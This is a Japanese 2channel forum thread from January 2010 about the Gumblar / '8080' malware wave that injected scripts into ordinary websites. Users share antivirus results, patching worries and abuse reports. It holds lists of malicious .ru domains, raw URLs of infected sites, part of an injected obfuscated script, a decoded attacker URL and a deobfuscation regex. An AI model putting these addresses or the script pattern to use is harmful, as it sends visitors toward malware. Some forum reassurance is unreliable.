10/01/15 20:34:24
>>244
自己レス
avast!が定義データ100115-0にて対応
JS:Illredir-CではなくJS:Illredir-Bで検出
結果: 14/41
URLリンク(www.virustotal.com)
603:名無しさん@お腹いっぱい。
10/01/15 20:34:40
DEPってXPのsp3以降からだったっけ?
604:名無しさん@お腹いっぱい。
10/01/15 20:43:38
SP2から
605:名無しさん@お腹いっぱい。
10/01/15 23:05:54
>>555
γ⌒ヽ
< ・、,,,;;,)
< つ=つ
ノ ノ三)
∠、 m)=m)
_,,_ ∩
(^Д^)/
⊂ ノ とったどー
(つ ノ
(ノ
606:名無しさん@お腹いっぱい。
10/01/16 03:39:44
URLリンク(www.mcafee.com)
こんな事してる場合じゃないでしょ
607:名無しさん@お腹いっぱい。
10/01/16 11:30:19
今回の改竄騒ぎで、ホームページ制作会社やクリエータにも影響があるのだが、
あまり語られていないな。
608:名無しさん@お腹いっぱい。
10/01/16 11:44:36
たぶん感染したことに気付いてないだけ
609:名無しさん@お腹いっぱい。
10/01/16 11:56:00
>>605
ネットの海で0円生活
伝説達成だなw
610:名無しさん@お腹いっぱい。
10/01/16 12:05:47
>>608
それで、納品物が改竄されたことに気づかず納品してしまい、
事件とになり契約を切られるわけですね。
発注元から、納品物の改竄チェックを要求されるはずなんだけどな。
611:610
10/01/16 12:10:28
もひとつ。
現場(客先)にくるソフト会社のSE・CEに「客のパソコンやサーバでWebサイト見るな」
といお達しでないのかな。とくにサーバメンテナンスとかできて、サーバ使うときとかね。
612:名無しさん@お腹いっぱい。
10/01/16 12:14:48
ITドカタと軽蔑されるのも無理ないな
613:611
10/01/16 12:24:41
うち業務サーバや情報サーバにインストールドキュメント読むため
AdobeReader入れてる。
そこで、うちにくる大手のSEに「以前までは許可していたけど、対策で切るまで
ダメね。」とつたえたら
SE「PDFはみませんよ」
といってたのでそれじゃダメだろと説明することになった。
(説明で本人も納得)
まだ、危険性が浸透していないな。
614:名無しさん@お腹いっぱい。
10/01/16 12:26:33
ここも改ざんされてる。
URLリンク(ppcdesu)●com/keyword/
615:名無しさん@お腹いっぱい。
10/01/16 12:37:41
へー
616:名無しさん@お腹いっぱい。
10/01/16 12:52:52
いわゆるガンブラーに感染してみた4 「あ、感染した。」 - smilebanana -
URLリンク(www.smilebanana.com)
この人の実験を読んでみるに、AdobeとかJavaとか以前にWindowsにSPすら当てていないPCで
管理されているページが多いってことなのかね。
617:名無しさん@お腹いっぱい。
10/01/16 13:32:53
>>613
もちょっとわかりやすく頼む
618:名無しさん@お腹いっぱい。
10/01/16 13:50:51
>>613
PDFを開かないから大丈夫と思い込んでたんだろそのSEは
インストールされてるだけでダメなのを知らずに
デフォルトでreaderのjavascriptがONになってるのも知らないだろうし
619:名無しさん@お腹いっぱい。
10/01/16 13:53:07
ウチ某役所だけどさ、端末に管理者権限ないからといって、OSは
xPのSP2、リーダーは9.1、IEは6のまま。
恐ろしいことに、管理者権限有のネット担当課の端末も同じ状態。
昨年から何度も更新しろと言ってるのに、検討している以外の答えなし。
なのに先週は、ガンブラーのチェックしろと言って、昨年秋に作成された
GENOの説明書送ってきやがった。
ネット管理を某大手民間に委託してもこれかよ、どれだけIT業界弱いんだよ。
管理者権限なくても、現にUSBマルウェア感染は大量に出ていて
使用禁止令が出てるんだが、それ以前の問題だろ。
脆弱性対策も、その何が危険なのかの職員向け説明もないままで、
今後管理者権限なくても発動するウィルスに化けたらどうするんだ。
つか、現時点では管理者権限なしなら大丈夫だよな?この前提が
崩れるなら、ネット全面禁止すべきだよな。役所の全端末がボット化
なんて想像したくもない。
620:名無しさん@お腹いっぱい。
10/01/16 14:04:02
感染したら担当の奴に責任を取らせればおkだろ
痛い目みてなんぼ
621:名無しさん@お腹いっぱい。
10/01/16 14:13:38
感染したファイルって手動でチマチマ書き換えていかなきゃいけないの?
会社のサーバの中見てたら去年のGENOがそのまま残ってるんだが・・・GENOとGumblarの同居とか
622:名無しさん@お腹いっぱい。
10/01/16 15:17:08
GUMBLAR(ガンブラー)ウイルス対策におすすめ!「ウイルスバスター2010」
URLリンク(www.yodobashi.com)
>「ウイルスバスター2010」を自信を持っておすすめします。
こんなもの(ザルセキュリティ)をオススメするなよ・・・
あと、URLを何とかしろwww
623:名無しさん@お腹いっぱい。
10/01/16 15:27:16
>>621
改ざんされるのはサーバ上のファイルだけでしょ
オリジナルファイルは別にあるんじゃないの?
624:名無しさん@お腹いっぱい。
10/01/16 16:33:36
大手IT企業なんて世相に疎い専門バカの集合
625:名無しさん@お腹いっぱい。
10/01/16 16:36:59
世相はどうでもいいけど専門馬鹿ならきちんと対処できなきゃダメだろw
626:名無しさん@お腹いっぱい。
10/01/16 16:44:58
>>619
> 脆弱性対策も、その何が危険なのかの職員向け説明もないままで、
> 今後管理者権限なくても発動するウィルスに化けたらどうするんだ。
説明して理解できる職員が何人居るやら・・・と、
某役所のアウトソースを引き受けてる俺が言ってみる。
「Adobe ReaderのJavaScript切れ」とは簡単に言えんのよ。
性格の悪い役人は「何できらにゃいかんのじゃゴルァ」とか
「切って何かあったら責任とってくれるんかゴルァ」とか言ってくる。
もちろん本音は面倒で設定変更したくないだけ。
だから、有効なソースを出して納得させないといけない
(反論の余地を与えないようにしないといけない)んだけど、
特に今回の場合Gunblarと8080系がごっちゃになってる状況で
8080系についてまともに解説してるのは個人のブログのような
ソースにできないものが殆だったから、レポートが思うように出せなかった。
IEが6のままってのも、移行にかかわる費用が捻出できんのでしょ。
偉い人から、「IE6はWinXPサポート終了までサポートされてるけど、なんで今わざわざ移行せにゃならんの?」
「既存のシステムの検証周りはWin7全面移行時でいいんじゃないの?」ってな感じで。
627:名無しさん@お腹いっぱい。
10/01/16 16:51:12
一度痛めに会わないと分からないのが人間だからどうしようもないな
628:名無しさん@お腹いっぱい。
10/01/16 17:10:06
たいていの人にとってパソコンって
まだまだよくわからない箱なんだよ。
設定変えて動かなくなった経験はみんなあって、
それが変にいじることへの抵抗になってる気がする。
629:名無しさん@お腹いっぱい。
10/01/16 18:10:11
>>619 >>626
うんこシス管(脆弱性放置)が多いから
URLリンク(all-freesoft.net)
こういうものが作られたんだろうな。
630:名無しさん@お腹いっぱい。
10/01/16 18:10:55
>>619
>xPのSP2、リーダーは9.1、IEは6のまま
業務システムなんかのの動作検証ができていない(検証すると金かかる。
不具合が出れば修正にさらに金かかる)ため同じようなとこあるよ。
XPSP2→SP3は、自動更新ではきつい(アップデートに時間がかかりすぎて
利用者からのクレームのもとになる)。だから人手にたよることになるため
お金がかかる(台数が多いと)。
Readerも自動更新の仕組みができていないと人手にたよるので更新にお金がかかる。
だから、そのままの会社(特に大企業)が多いんじゃないかな。
631:名無しさん@お腹いっぱい。
10/01/16 19:17:09
>>620
役所だと、担当者ではなく、業者の責任にするんじゃなすかな。
>>626
>特に今回の場合Gunblarと8080系がごっちゃになってる状況で
>8080系についてまともに解説してるのは個人のブログのような
>ソースにできないものが殆だったから、レポートが思うように出せなかった。
漏れもそう。ただ、役所や客にだすわけではないけど対策の報告作るのに考えちまったよ。
うちの会社はFWで社外向け8080の通信をブロックするようにしているから、8080系からは
守られたようだ。しかし、「FWがあるから大丈夫でしょ」という間違った認識をもたれると
困るので報告からははずした。
632:名無しさん@お腹いっぱい。
10/01/16 19:18:10
出張などでアップデートを行うビジネスがある事を考えると
結構多くの人が無防備な状態でパソコンを使っているのだろうね。
そりゃガンプラとか蔓延するわな。
633:名無しさん@お腹いっぱい。
10/01/16 19:23:47
CMやってるくらい有名なウイルスバスターが入ってるから大丈夫に決まってる
ウィンドウズ標準のFWが入ってるから何も問題はない
問題があったらお前が悪い
634:名無しさん@お腹いっぱい。
10/01/16 19:53:20
うちの学校のコンピュータ室はこいつ使ってる
URLリンク(www.nec.co.jp)
WindowsもLinuxみたいに主要なアプリはコマンド一発でアップデート出来たらいいのに
635:名無しさん@お腹いっぱい。
10/01/16 20:07:29
MSがレポ管理したら間違いなく戦争になる
636:名無しさん@お腹いっぱい。
10/01/16 20:09:30
ネットワークブートなんて・・・帯域不足祭
637:名無しさん@お腹いっぱい。
10/01/16 20:49:41
で
どれ踏めばいいんだ?
638:名無しさん@お腹いっぱい。
10/01/16 21:23:56
新宿ヨドバシのパソコンコーナーに逝ったらそこら中にガンブラーの張り紙がwww
639:名無しさん@お腹いっぱい。
10/01/16 21:26:09
>>637
testしたいの?
改竄されたサイトで放置してる馬鹿サイトなら
スレリンク(sec板:879番)
↑ここにあるけど
640:名無しさん@お腹いっぱい。
10/01/16 21:48:31 BE:1056145267-PLT(12031)
>>639
1月15日22:47:50頃に修正されてる
641:名無しさん@お腹いっぱい。
10/01/16 21:56:47
>>638
セキュリティソフトの販売コーナーのパソに張り紙がしてあったら笑えたな。
642:名無しさん@お腹いっぱい。
10/01/16 22:04:36
>>629
穴を逐次埋めていくのではなく、アンチウイルスソフトやHIPS、ファイアーウォールを使用して、
穴があっても突くことが出来ないようにして穴が埋まったのと同等にする。
っていう考え方は存在するし、良く使われる。もちろん推奨されるものではないが。
いかに少ないコスト(金銭/人的リソース)でインシデント発生を防ぐかってのがあるからな。
どっかにこういうことをまとめてあったページがあったような気がするけど忘れた。
643:名無しさん@お腹いっぱい。
10/01/16 22:15:41
スレリンク(cafe40板:151番)
644:名無しさん@お腹いっぱい。
10/01/16 22:21:32
Gumblarって不正なpdfがgumblar.cnでホスティングされてた事から名付けられたんだよな
じゃあ今回のウイルスはthechocolateweb.ruでホスティングされてるからChocolatewebになるのかな?
645:名無しさん@お腹いっぱい。
10/01/16 22:24:35
Chocolatewebならモロゾフで
646:名無しさん@お腹いっぱい。
10/01/16 22:31:50
ちら裏
ここまでハケーンしたの
ampsguide.ru
burkewebservices.ru
carswebnet.ru
guidebat.ru
lagworld.ru
suesite.ru
superaguide.ru
theatticsale.ru
theaworld.ru
thechocolateweb.ru
thelaceweb.ru
themobilewindow.ru
themobisite.ru
viewhomesale.ru
webdirectbroker.ru
webnetenglish.ru
webnetloans.ru
whosaleonline.ru
worldsouth.ru
worldwebworld.ru
647:名無しさん@お腹いっぱい。
10/01/16 22:56:21
誰か通報よろしく。一番上は普通のサイトだけど下は宣伝サイトね
URLリンク(www.p-moon)<)●jp/
URLリンク(mdoh.mods)<)●jp/
URLリンク(under.under)<)●net/
URLリンク(emika.babymilk)<)●jp/
URLリンク(lovable.ciao)<)●jp/
あんまり見つからないなあ。終了したサイトのドメインでやってる宣伝サイトが
感染(配布)してることが多い?
648:名無しさん@お腹いっぱい。
10/01/16 23:00:37
名称候補としては Quicksilver ってのがあるらしい。
Quicksilver Malware Network | Unmask Parasites. Blog.
URLリンク(blog.unmaskparasites.com)
649:名無しさん@お腹いっぱい。
10/01/16 23:05:52
かっこよすぎだろ
珍走団的なダサい名前でいいよ
650:名無しさん@お腹いっぱい。
10/01/16 23:07:36
なんで水銀なんだろう?
651:名無しさん@お腹いっぱい。
10/01/16 23:16:59
形容詞としては
(水銀のように)動きや変化が激しい
ってのがあるからだろう。
652:名無しさん@お腹いっぱい。
10/01/16 23:17:51
>>647
一番上Dan's View Sourceと飛び先のチェックを撥ねてるっぽい。。。
653:名無しさん@お腹いっぱい。
10/01/16 23:23:02
>>651
なるほど
654:名無しさん@お腹いっぱい。
10/01/16 23:57:49
URLリンク(oshiete1.goo.ne.jp)
>良くHIPSやプロアクティブの事を言われる方を見受けますが実際は
>GENOウイルスには全く役に立ちませんでした
655:名無しさん@お腹いっぱい。
10/01/17 00:01:36
javaのチェッカーで調べたら
エラー。お使いのオペレーティングシステムに推奨されたバージョンの Java がインストールされていません。
って出たんですけど古いバージョンってことかな?
656:名無しさん@お腹いっぱい。
10/01/17 00:05:08
>>655
早急にアップデートしましょう
657:名無しさん@お腹いっぱい。
10/01/17 00:06:44
何の事だか解らないのでググッてみた
URLリンク(images.google.com)
URLリンク(images.google.com)
658:名無しさん@お腹いっぱい。
10/01/17 00:09:28
>>655
JRE入れた記憶はあるの?
659:名無しさん@お腹いっぱい。
10/01/17 00:11:25
最新ってVersion 6 Update 17だよな?
660:名無しさん@お腹いっぱい。
10/01/17 00:14:23
URLリンク(www.pcdepot.co.jp)
最新チラシにガンブラー診断実施中とありますが
無知に付け込んで客を騙し金を巻き上げるのは如何なものかと
661:名無しさん@お腹いっぱい。
10/01/17 00:15:19
>659
Version 6 Update 18
662:名無しさん@お腹いっぱい。
10/01/17 00:16:17
>>661
mjsk
663:名無しさん@お腹いっぱい。
10/01/17 00:17:46
JREは17だろjk
664:名無しさん@お腹いっぱい。
10/01/17 00:20:02
>>663
URLリンク(java.sun.com)
665:名無しさん@お腹いっぱい。
10/01/17 00:22:02
セキュリティ修正は含まれてないんだっけか
666:名無しさん@お腹いっぱい。
10/01/17 00:26:56
機能拡張とゴミ収集の強化ぐらいだな
667:名無しさん@お腹いっぱい。
10/01/17 00:27:47
>>664
JavaSEって開発向けだろ?
被害があるとしたら明らかにJRE・・・
668:名無しさん@お腹いっぱい。
10/01/17 00:29:31
URLリンク(java.sun.com)
ここから普通にJRE 6 Update 18がダウンロード出来る
669:名無しさん@お腹いっぱい。
10/01/17 00:32:04
Anti Javaの俺に隙はなかった
670:名無しさん@お腹いっぱい。
10/01/17 00:35:01
>>647
通報作業中だけど3番目と9番目のリンク先もぁぅぁぅ
URLリンク(horiken)<)●fem.jp/
URLリンク(ko-akuma)<)●net/ める
URLリンク(swdp)●pecori●jp/ ろりぽ
671:名無しさん@お腹いっぱい。
10/01/17 00:39:19
>>670
てかほかにもいっぱいあたー
672:名無しさん@お腹いっぱい。
10/01/17 00:51:01
って、ことで追加>>670
URLリンク(in-out)<)●linto●org/gannkaken/
URLリンク(www)●bridal-lasik●com/
673:名無しさん@お腹いっぱい。
10/01/17 01:09:57
自作板から来ました
以下のURLを2ch専用ブラウザで開いた所、nortonのAUTO-PROTECTが激しく反応し
固まったのですがこれは大丈夫なんでしょうか・・・・?
尚、検出名は、Trojan.Malscript.Bとなっておりファイル元はIEのキャッシュファイルとなっています(IE使用型の2chブラウザです)
スレリンク(jisaku板)
674:名無しさん@お腹いっぱい。
10/01/17 01:19:07
自分には、感染しているか調べる敷居が高い
早くチェッカーできないかな・・・
675:名無しさん@お腹いっぱい。
10/01/17 01:36:14
>>670
おお、通報ありがとうございます
676:名無しさん@お腹いっぱい。
10/01/17 01:38:04
>>673
何故ここに来た?
2chの板はGENOと何も関係無いだろう
677:名無しさん@お腹いっぱい。
10/01/17 01:39:58
>>674
対策ちゃんとしてれば良いよ
それ以上は無理する必要ないです
678:名無しさん@お腹いっぱい。
10/01/17 01:40:05
>>673
危険かもしれない物を直リンするなタコ
さっさとクビをくくれ
679:名無しさん@お腹いっぱい。
10/01/17 01:40:58
>>673
PC慣れてないのに自作板とな?
680:名無しさん@お腹いっぱい。
10/01/17 01:42:55
はいはい、aguse.jp
URLリンク(www.aguse.jp)
681:名無しさん@お腹いっぱい。
10/01/17 01:46:52
2ch自体が感染していない限りはスレURL踏んで感染する事はない
キャッシュ生成する専ブラも同様
そもそも、現在は既知のセキュリティホール内で収まっているから各ソフトウェアをアップデート
及びセキュリティソフトの定義を最新に保っておけば仮に直接踏みに言っても感染はしない
これから先は保証出来ないがな
682:名無しさん@お腹いっぱい。
10/01/17 02:00:54
>>675
>>670-672のほかにもありそうだけどみなかったことにして、
4番目まで了
mdoh●mods●jp ろりぽ
higata●sakura●ne●jp さくら
あと11
683:名無しさん@お腹いっぱい。
10/01/17 02:07:49
”今”最新でも明日にはもう使い物になないことが多いからな、特にウイルス対策ソフト
684:名無しさん@お腹いっぱい。
10/01/17 02:10:33
OSや該当ソフトを最新にしておけば問題ない
685:名無しさん@お腹いっぱい。
10/01/17 02:21:32
今駆除したけど、こんなのに感染してました
Trojan:Java/Selace.K
Exploit.Java/CVE-2008-5353.C
Trojan:Java/Selace.L
別に怪しいサイト踏んでないし、エロも海外も踏んでないのにどうして…
大丈夫でしょうか?
ウイルス対策ソフトはMSE使ってます。
ウイルスに感染したのは初めてでビビってます。
これが噂のガンブラーってやつですか?
>>2のテンプレ見てとりあえずadobe readerはアップデートしました。
windows updateも万全です。
Adobe Flash PlayerはPCに入ってませんでした。(買ったばかり)
それからjavaっていうのがよくわかりません。
じっぷらで質問スレ立てたら、javaをアップデートしたほうがよいと指摘されたんですが、
「java」で検索して出てくるプログラムは「java platform se binary」というので、
クリックしても一瞬画面にdosが出てくるだけで何も応答ありません。
ウイルス初心者です。初めての感染です。OSはWindows7です。よろしくお願いします。
686:名無しさん@お腹いっぱい。
10/01/17 02:23:40
リカバリー推奨
687:685
10/01/17 02:26:46
>>686
え?まじですか?
パソコンを購入時の状態に戻さないとダメですか?
駆除しましたけどこのままじゃダメですか?
688:名無しさん@お腹いっぱい。
10/01/17 02:27:24
UACはONになっていましたか?
689:名無しさん@お腹いっぱい。
10/01/17 02:29:36
>>685
ウイルスを発見した場所はどこだ?
キャッシュなら問題ない
690:名無しさん@お腹いっぱい。
10/01/17 02:33:47
>>688
すいません、返事遅くなって。UACってなんのことだがわからなくていろいろ調べてました。
パソコン起動したときに出てくるパスワード入力のことですね?
それだったら設定してます。
691:名無しさん@お腹いっぱい。
10/01/17 02:36:32
>>687
不安ならオンラインスキャンも検査しとけよ。
URLリンク(ppcdesu.com)
URLリンク(www.puzzue.com)
692:名無しさん@お腹いっぱい。
10/01/17 02:38:05
p://comcast-net●videosz.com●welt-de●ampsguide●ru:8080/pics/ChangeLog.pdf
p://www●balbal●net/
この辺もあうあうあー
693:名無しさん@お腹いっぱい。
10/01/17 02:38:10
まず、”Exploit.Java/CVE-2008-5353.C”→JREをターゲットにしたExploitで散々既出で割と古い形式。
ただし、UACなどユーザー操作はスルーしない。注意したいのはJREはクリーンアンインストール後に最新版を入れるように
しないと旧バージョンが残存していて感染の危険性はある
他二つもGumblar系だね
モロゾフに一式入っていた気がする
>別に怪しいサイト踏んでないし、エロも海外も踏んでないのにどうして…
海外も被害は出てるけど最近ではむしろ、日本国内の普通のサイトが危ないです
ほとんど無差別散布
ところで>>689が言ってるようにファイル元はどこ?
URLに反応しての遮断ではなく駆除なんだよね?
694:685
10/01/17 02:38:36
>>689
今、MSEで削除したウイルスの履歴を見ました。
項目全てに「cashe」の文字が含まれているんですが、これはキャッシュという意味ですか?
問題ないんでしょうか?
695:名無しさん@お腹いっぱい。
10/01/17 02:41:24
見覚えがないなら掲示板のURLにでも反応したのかも
janeやその他主要専ブラだと画像サムネイル機能とかあるしそこから検出される事がよくある
馬鹿が面白がって貼りまくってるからな
696:名無しさん@お腹いっぱい。
10/01/17 02:43:23
これらに感染すると症状が派手で明らかに分かるレベルでそれが救いと言える
感染はしていないんじゃないかな?
697:685
10/01/17 02:47:02
MSEで感染した項目を一部書きますと、
containerfile:C:\Users\(登録名)\AppData\Local\Temp|jar_cashe(以下数字羅列).tmp
こんな感じです。全部は書き出せませんが、全部これと同じ形式で表示されます。
「cashe]という文字が全てにあります。
なお、いまのところパソコンの動作にこれといって異常は感じていません。
698:名無しさん@お腹いっぱい。
10/01/17 02:49:32
>>697
なら大丈夫でしょう、
検出されたということは事前に阻止されたという証拠
699:名無しさん@お腹いっぱい。
10/01/17 02:50:15
知り合いのサイトが/*LGPL*/の8080に感染していた。
avast反応せず・・・役に立たないねorz
でも良く発見出来たな、オレ。自分で自分を褒めたいです。
で、こちらXPSP3(2010年1月分のパッチ済み)、IE8でサイト閲覧したんだが、
avastでスキャンしたところどうも感染してなさそうなんだけど、そこで質問です。
・「IE7以前だと危険」という書き込みを見たが、IE8だと感染しないのか?
・avastだと感染してても検出しない? ウイルスバスター(オンラインスキャン)だと検出する?
やっぱカスペルスキー(オンラインスキャン)でチェックすべき?
・知り合いのサイトはネットショップなんだけど、「サイト感染してました」と注意喚起をトップに書いておくべき?
他にも質問があったんだが忘れた・・・回答お願いします。
ちなみに、オレの閲覧時のPC環境
adobe reader:9.10
flash player:不明(アップデート必要だった
java:不明(アップデート必要だった
700:685
10/01/17 02:52:42
>>698
すごい安心しました。ありがとうございます。
最後にひとつだけ質問させてください。
アマゾンで買い物するのでクレカ情報盗まれたらどうしようって…心配だったんですが
その心配はないんでしょうか?
701:名無しさん@お腹いっぱい。
10/01/17 02:55:41
>>700
クレカの情報を入力するときにウイルスが動いていたらキーボードの入力を盗むことが出来る
URLリンク(ja.wikipedia.org)
702:名無しさん@お腹いっぱい。
10/01/17 03:00:06
>>701
今のPC買ったのが昨年の12/24です。
買ったばっかりです。
で、今までこのパソコンでネットショッピングしたことはありません。
とりあえず大丈夫ですよね?
703:名無しさん@お腹いっぱい。
10/01/17 03:00:28
クレカとか無いから
WEB弄られて踏み台にされるだけ
704:685
10/01/17 03:02:21
ありがとうございます。安心しました。今から一服します。
みなさん夜遅くほんとうにありがとうございました。
705:名無しさん@お腹いっぱい。
10/01/17 03:02:34
クレカ情報盗まれたらニュースになるわな
706:名無しさん@お腹いっぱい。
10/01/17 03:06:59
今後変化してダウンローダ型のウイルス(ウイルスがウイルスをダウンロードしてくれる)になる可能性もあるから注意だな
707:名無しさん@お腹いっぱい。
10/01/17 03:09:45
>>682続き
めんどくさくなったのでいっぺんに送った。
under●under●jp/ ろりぽ
www●cute-max●net/ ろりぽ
emika●babymilk●jp/ ろりぽ
yuck●pepper●jp/ ろりぽ
lovable●ciao●jp/ ろりぽ
dp11046722●lolipop●jp/ ろりぽ
horiken●ciao●jp/ ろりぽ
eefy●fem●jp/ ろりぽ
ko-akuma●jp/ ろりぽ
in-out●upper●jp/ ろりぽ
tarenagashi●boo●jp/ ろりぽ
あとふたつ
708:名無しさん@お腹いっぱい。
10/01/17 03:10:26
>>699
avast!反応せずってそれ新型じゃねーの?
つか、どこのサイトだよ。
検体送付するから教えれ。
709:名無しさん@お腹いっぱい。
10/01/17 03:11:20 BE:1131584459-PLT(12031)
>>707お疲れ様です
710:名無しさん@お腹いっぱい。
10/01/17 03:19:49
>>691
ナニコレ
711:名無しさん@お腹いっぱい。
10/01/17 03:21:04
>>708
もう修正しちまってるが、改ざんされたjsは1つ保存してる。
/*LGPL*/以降の難読化部分をうpればいいかな?
712:名無しさん@お腹いっぱい。
10/01/17 03:22:38
>>691
Trojan.JS.Agent.baeってうあああああああああああああああああ
713:名無しさん@お腹いっぱい。
10/01/17 03:23:16
>>704
スキャンで発見したならブロックできたわけじゃないんじゃね
買ったばかりならリカバリもすぐできるだろうしリカバリしたほうが
精神的にもいいよ
あとFlashPlayerは動画サイト見てれば入ってます
ヤフーのトップにある動く広告が見えてれば入ってます
Javaに関してはコントロールパネルからバージョンを確認するか
以下から確認してください
URLリンク(www.java.com)
714:名無しさん@お腹いっぱい。
10/01/17 03:27:15
通報お願いします
インディーズ情報サイト
URLリンク(www.music-trip.que.ne)<)●jp/asakawa/
URLリンク(www.suzuran7)<)●com/
一番下のやつがなんかすこし変わってる。aguseで検出できず
<script>/*LGPL*/ try{ window.onload = function(){E1e6wn3ijzwv9g = 'h$@t##()t(!&@p!@:@/&@/$^&()
715:名無しさん@お腹いっぱい。
10/01/17 03:28:12
ウイルス感染URLをそのまま貼るな!!
716:名無しさん@お腹いっぱい。
10/01/17 03:29:09
URLリンク(www.dotup.org)
難読化部分だけうpしますた。
難読化を複号するとこんなアドレス。
URLリンク(haberturk-com.welt.de.over-blog-com.anycitytown.ru:8080)
717:名無しさん@お腹いっぱい。
10/01/17 03:30:07
生アドレスのリンクを張るとか嫌がらせですか?
718:699=711
10/01/17 03:30:34
あ、>>716は699=711です。
719:名無しさん@お腹いっぱい。
10/01/17 03:32:26
ウィルスアップしてるならウィルスって書いてくれ・・・
720:699=711
10/01/17 03:34:06
あ、ゴメン・・・何かすさまじくアホなことしてますか・・・?
721:名無しさん@お腹いっぱい。
10/01/17 03:34:08
報告に見せかけてURLを踏まそうとする罠
722:名無しさん@お腹いっぱい。
10/01/17 03:40:08
Windows XP SP3
Java 6 Update 3
Adobe Reader 9.1
で感染するか試してみる
723:名無しさん@お腹いっぱい。
10/01/17 03:40:52
難読化部分の完全な解読って出来るのか?
724:名無しさん@お腹いっぱい。
10/01/17 03:42:10
>>716
>>714 の一番下のと同タイプみたいですね
725:名無しさん@お腹いっぱい。
10/01/17 03:42:30
>>723
もちろん
Firebugのコンソールに突っ込んだり・・・
手動でゴリゴリってのも一つの手段w
726:722
10/01/17 03:51:10
ちょ・・感染ページ開いたらブルスクで落ちた
727:名無しさん@お腹いっぱい。
10/01/17 03:52:31 BE:6288858-2BP(1236)
>>707続き
bridal-lasik●com さくら
linto●org でじろく
あきたねる
728:名無しさん@お腹いっぱい。
10/01/17 03:56:56
>>727
乙でした
729:685
10/01/17 03:58:12
>>713
ありがとう。確認しました。最新のが既に入ってました。助かります。
730:722
10/01/17 04:01:12
ブルスク意外に目立った変化がないな・・
URLリンク(www.dotup.org)
URLリンク(www.dotup.org)
731:名無しさん@お腹いっぱい。
10/01/17 04:01:26
ここまで俺一人の自作自演
732:名無しさん@お腹いっぱい。
10/01/17 04:59:10 BE:8489669-2BP(1236)
ねるねる鷺
>>714
インディーズ情報サイト
www●music-trip●que●ne●jp める
針灸院
yamanashi●harikyu●or●jp/asakawa める
www●suzuran7●jp ジェイナビ
hikiyamahari●com さくら
ろりぽ以外はめるで同時にJPCERT/CCにもつーほー
733:名無しさん@お腹いっぱい。
10/01/17 11:59:48
夜中から明け方は賑わって、夜が明けるとひっそり。
おまえら魔族か?
734:名無しさん@お腹いっぱい。
10/01/17 12:00:45
セキュリティー怪獣
γ⌒ヽ
< ・、,,,;;,)
< つ=つ
ノ ノ三)
∠、 m)=m)
ガンプラー
(2009 ~ )
735:名無しさん@お腹いっぱい。
10/01/17 12:03:09
>>495-507
736:名無しさん@お腹いっぱい。
10/01/17 12:18:24
パルコール嬬恋スキーリゾート
のホーページに異変あり?
737:名無しさん@お腹いっぱい。
10/01/17 12:40:23
>>734-735
w
738:名無しさん@お腹いっぱい。
10/01/17 12:50:27
>>736
ぐぐったら二つアドレスがあってどっちもぁぅぁぅぁー
739:名無しさん@お腹いっぱい。
10/01/17 12:53:05
>>736
>>714 下の亜種スクリプトか・・・
740:名無しさん@お腹いっぱい。
10/01/17 13:04:29
とりあえず>>646に
anycitytown.ru
easylifedirect.ru
追加で
741:名無しさん@お腹いっぱい。
10/01/17 13:53:26 BE:3302137-2BP(1236)
>>736
めるした。
ついでに検体も送付先いぱーい
URLリンク(www.virustotal.com)
File index.html received on 2010.01.17 04:04:47 (UTC)
Result: 6/41 (14.63%)
あばばばばば
742:名無しさん@お腹いっぱい。
10/01/17 14:47:44
>>736
電凸してみました
OS:ME+ノートン2010だがHPは開けますが?と
&名誉毀損で警察に訴えるそうですw
743:名無しさん@お腹いっぱい。
10/01/17 14:52:33
>742
日曜日だし、ネタだろ?
…ネタだよな?
744:名無しさん@お腹いっぱい。
10/01/17 14:59:58
この辺りに報告した方が効果有るんじゃないのか
s://form.jpcert.or.jp/
p://www.google.com/safebrowsing/report_badware/
745:名無しさん@お腹いっぱい。
10/01/17 15:03:20
本当なら訴えて恥かけばいいよ
善意の一般人を犯罪者呼ばわりするなんて
746:名無しさん@お腹いっぱい。
10/01/17 15:11:21
Googleに通報してやるのが一番だな。検索して安全でないとか表示されて痛い目に遭わんとわからんだろ多分
747:名無しさん@お腹いっぱい。
10/01/17 15:13:33
> OS:ME+ノートン2010だがHPは開けますが?と
> &名誉毀損で警察に訴えるそうですw
ノートン2010ってMEで動くの?
748:名無しさん@お腹いっぱい。
10/01/17 15:37:05
>>747
このスレの住人にとっては失笑ものでしょうけど
一般的にはこんなものでしょうw
749:名無しさん@お腹いっぱい。
10/01/17 15:37:19
最近のガンブラーすげーじゃん。
MGとかめちゃリアルだし、しかも接着剤、塗料不要だからしんなー臭い思いしなくて済む。
昔のはよく股関節折れたりしたな。
750:742
10/01/17 15:45:26
警視庁の特捜課のハイテク課にマブダチがいるそうです
モロゾフの件もここが捜査をしているので勝負したるでw
751:名無しさん@お腹いっぱい。
10/01/17 15:53:43
これさ
感染したら、裏でウイルスDLしてくるんでしょ
具体的に、どんな症状がでてくるんでしょうか?
752:名無しさん@お腹いっぱい。
10/01/17 16:04:10
>>751
見た目分かりやすいのが偽セキュリティソフトの
「Security Tool」がインストールされることだろう
他にもあるんだろうが裏でこっそりやられてたらわからん
ダウンロードされるウイルスによるだろうな
753:名無しさん@お腹いっぱい。
10/01/17 16:41:38
>>736
カスペだと↓こんなん出ました~
2010/01/17 16:33:31 検出しました: HEUR:Trojan-Downloader.Script.Generic URLリンク(www)●s-palcall●com/
754:名無しさん@お腹いっぱい。
10/01/17 16:45:32
とりあえずパルコールのサイトをGoogleに通報してみよう
こんな文面でおk?
URLリンク(www)●s-palcall●com/
This site is infected with '8080 Virus', accessing to malicious PDF file.
755:名無しさん@お腹いっぱい。
10/01/17 16:50:35
>725
ちょっと解析のやり方教えてくれ
756:名無しさん@お腹いっぱい。
10/01/17 17:11:15 BE:1131584459-PLT(12031)
URLリンク(genochk.crz.jp) は
preg_match_all("/'([^']+)'\.replace\(\s*(\/[^\/]+\/i*)g*\s*,\s*'([^']*)'/","文字列",$match);
で難読化コードと置換パターンを取り出してpreg_replaceに突っ込んでる
Firefoxなら
'~難読化された文字列~'.replace(/&|#|\$|\(|@|\!|\^|\)/ig , ''); を取り出して
Firebugという拡張で突っ込むだけ
URLリンク(www.dotup.org)
757:名無しさん@お腹いっぱい。
10/01/17 17:21:50
JTBのサイトも感染してる?
758:名無しさん@お腹いっぱい。
10/01/17 17:21:57
JavaScriptを報告するよりウイルス本体を報告すべきだろ
759:名無しさん@お腹いっぱい。
10/01/17 17:26:53
>>756
ぜんぜん難読じゃなくね
普通に置換してるだけじゃん
760:名無しさん@お腹いっぱい。
10/01/17 17:31:08 BE:452634236-PLT(12031)
>>759
なんどく 0 【難読】
